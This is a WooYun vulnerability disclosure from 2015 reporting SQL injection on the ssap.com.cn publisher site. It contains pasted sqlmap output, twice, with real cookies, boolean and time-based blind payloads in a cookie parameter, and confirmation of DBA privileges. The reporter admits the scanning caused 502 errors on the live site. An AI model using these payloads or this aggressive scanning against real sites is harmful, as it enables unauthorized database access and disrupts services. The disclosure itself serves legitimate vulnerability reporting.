当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107430

漏洞标题:社会科学文献出版社主站存在注入

相关厂商:ssap.com.cn

漏洞作者: 花心h

提交时间:2015-04-13 10:10

修复时间:2015-06-01 17:08

公开时间:2015-06-01 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

这次如果要送能不能送点与专业相关的书啊,不要催眠术啊(╯‵□′)╯︵┻━┻

详细说明:

布尔型注入
貌似网站502了= =。。。不会是我扫描过猛吧,,实在不好意思
DBA权限
http://www.ssap.com.cn:80 [59.38.99.24]
======================================================
GET /web/c_0000003100040001/ HTTP/1.1
Host: www.ssap.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.ssap.com.cn/Member/PiShuIntros.aspx
Cookie: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid%3D1908397961-1428759007-http%253A%252F%252Fwww.ssap.com.cn%252F%26ntime%3D1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004; _gat=1; CNZZDATA4317812=cnzz_eid%3D1323314981-1428756685-%26ntime%3D1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d
Type: boolean-based blind
Title: PostgreSQL stacked conditional-error blind queries
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=-9286))); SELECT (CASE WHEN (7761=7761) THEN 7761 ELSE 1/(SELECT 0) END)--; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
Type: AND/OR time-based blind
Title: PostgreSQL AND time-based blind (heavy query)
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004))) AND 8326=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND (((3756=3756; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
---
[11:26:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[11:26:44] [INFO] testing if current user is DBA
[11:26:44] [INFO] fetching current user
[11:26:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:26:44] [INFO] retrieved:
[11:27:20] [INFO] retrieved:
[11:27:20] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:27:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: True
[11:27:21] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 134 times
[11:27:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.ssap.com.cn'
[*] shutting down at 11:27:21

漏洞证明:

布尔型注入
DBA权限
http://www.ssap.com.cn:80 [59.38.99.24]
======================================================
GET /web/c_0000003100040001/ HTTP/1.1
Host: www.ssap.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.ssap.com.cn/Member/PiShuIntros.aspx
Cookie: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid%3D1908397961-1428759007-http%253A%252F%252Fwww.ssap.com.cn%252F%26ntime%3D1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004; _gat=1; CNZZDATA4317812=cnzz_eid%3D1323314981-1428756685-%26ntime%3D1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d
Type: boolean-based blind
Title: PostgreSQL stacked conditional-error blind queries
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=-9286))); SELECT (CASE WHEN (7761=7761) THEN 7761 ELSE 1/(SELECT 0) END)--; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
Type: AND/OR time-based blind
Title: PostgreSQL AND time-based blind (heavy query)
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004))) AND 8326=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND (((3756=3756; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
---
[11:26:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[11:26:44] [INFO] testing if current user is DBA
[11:26:44] [INFO] fetching current user
[11:26:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:26:44] [INFO] retrieved:
[11:27:20] [INFO] retrieved:
[11:27:20] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:27:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: True
[11:27:21] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 134 times
[11:27:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.ssap.com.cn'
[*] shutting down at 11:27:21

修复方案:

版权声明:转载请注明来源 花心h@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-17 17:06

厂商回复:

非常感谢

最新状态:

暂无